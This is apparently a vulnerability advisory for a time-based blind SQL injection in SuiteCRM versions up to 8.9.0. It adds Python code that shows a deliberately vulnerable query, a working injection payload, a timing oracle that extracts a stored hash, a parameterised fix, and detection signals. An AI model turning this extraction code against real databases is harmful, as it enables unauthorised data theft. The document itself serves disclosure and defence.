PT-2025-45525 · Suitecrm · Suitecrm

Published

2025-09-04

·

Updated

2025-12-17

·

CVE-2025-64492

CVSS v2.0

9.0

High

Vector

AV:N/AC:L/Au:S/C:C/I:C/A:C
Name of the Vulnerable Software and Affected Versions

SuiteCRM versions 8.0.0 through 8.9.0
Description

SuiteCRM is an open-source Customer Relationship Management (CRM) application. Versions 8.9.0 and earlier contain a time-based blind SQL injection flaw. An authenticated attacker can inject a condition and a delay primitive into a database query so that the server's response time reveals whether the condition held; no query result ever appears in the response, but by repeating the request the attacker recovers data from the database one bit at a time. In this way an attacker could enumerate database, table and column names, extract records, or escalate privileges. SQL injection occurs when an attacker can manipulate a database query through crafted input, potentially leading to unauthorized access or data leakage. Over 1000 SuiteCRM instances were identified in the Russian segment of the Internet.
Recommendations

Update SuiteCRM to version 8.9.1 or later. Exploitation requires an authenticated account, so limiting who can log in and reviewing accounts for unexpected users reduces exposure until the update is applied, but does not remove it.
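As an added illustration of the technique described above (constructed example code, not SuiteCRM's code, and not the actual vulnerable query, parameter or schema, none of which this page identifies): a deliberately vulnerable lookup that splices user input into SQL, the parameterised version that closes the hole, and a timing oracle that recovers a stored value character by character from the response delay alone. The `users` table, the `SLEEP()` function registered on SQLite, the `user_hash` value and the `DELAY` constant are all assumptions of the demo.

```python
import sqlite3
import time

DELAY = 0.05  # seconds of induced delay per "true" oracle answer (assumed value)


def build_db():
    """Constructed in-memory stand-in for a CRM database (not SuiteCRM's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, user_name TEXT, user_hash TEXT)"
    )
    conn.execute("INSERT INTO users VALUES (1, 'admin', 's3cr3t')")  # constructed row
    # SQLite has no SLEEP(); register one so the timing side channel that
    # MySQL's SLEEP() or PostgreSQL's pg_sleep() would provide exists here too.
    conn.create_function("SLEEP", 1, lambda secs: time.sleep(secs) or 0)
    return conn


def lookup_vulnerable(conn, user_name):
    """Deliberately vulnerable: the input is concatenated into the SQL text."""
    sql = "SELECT id FROM users WHERE user_name = '" + user_name + "'"
    return conn.execute(sql).fetchall()


def lookup_fixed(conn, user_name):
    """Hardened: bound parameter, so the input never reaches the SQL parser as code."""
    return conn.execute(
        "SELECT id FROM users WHERE user_name = ?", (user_name,)
    ).fetchall()


def oracle(conn, condition):
    """One blind request: True if the server delayed, i.e. `condition` held.

    The payload closes the string literal, adds a CASE that sleeps only when
    the condition is true, and comments out the rest of the original query.
    """
    payload = "x' OR CASE WHEN (%s) THEN SLEEP(%g) ELSE 0 END --" % (condition, DELAY)
    start = time.perf_counter()
    lookup_vulnerable(conn, payload)  # the result is always empty; only timing leaks
    return time.perf_counter() - start > DELAY / 2


def extract_secret(conn, max_len=32):
    """Recover users.user_hash for id 1 using nothing but the timing oracle.

    Each character is found by binary search over printable ASCII, so it
    costs about seven requests rather than one request per candidate byte.
    """
    secret = "(SELECT user_hash FROM users WHERE id = 1)"
    recovered = ""
    for pos in range(1, max_len + 1):
        if not oracle(conn, "length(%s) >= %d" % (secret, pos)):
            break  # past the end of the value
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, "unicode(substr(%s, %d, 1)) > %d" % (secret, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


def injection_blocked(conn):
    """True if the hardened lookup neither matches nor delays on the payload."""
    payload = "x' OR CASE WHEN (1=1) THEN SLEEP(%g) ELSE 0 END --" % DELAY
    start = time.perf_counter()
    rows = lookup_fixed(conn, payload)
    return rows == [] and time.perf_counter() - start < DELAY / 2


if __name__ == "__main__":
    db = build_db()
    print("vulnerable lookup leaks:", extract_secret(db))
    print("parameterised lookup blocks the payload:", injection_blocked(db))
```

Recovering the six-character value takes roughly fifty requests, each carrying the same injected structure and differing only in the position and threshold being tested; over a real network an attacker has to use longer delays or repeat measurements to ride out jitter, which makes the burst of near-identical requests with delay functions (`SLEEP`, `BENCHMARK`, `pg_sleep`, `WAITFOR DELAY`) and bimodal response times a usable detection signal in web server logs. The parameterised lookup returns no rows and no delay for the same payload because the input is bound as data rather than parsed as SQL.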

Exploit

Fix

RCE

SQL injection

Weakness Enumeration

Related Identifiers

BDU:2025-10914
CVE-2025-64492
GHSA-54M4-4P54-J8HP

Affected Products

Suitecrm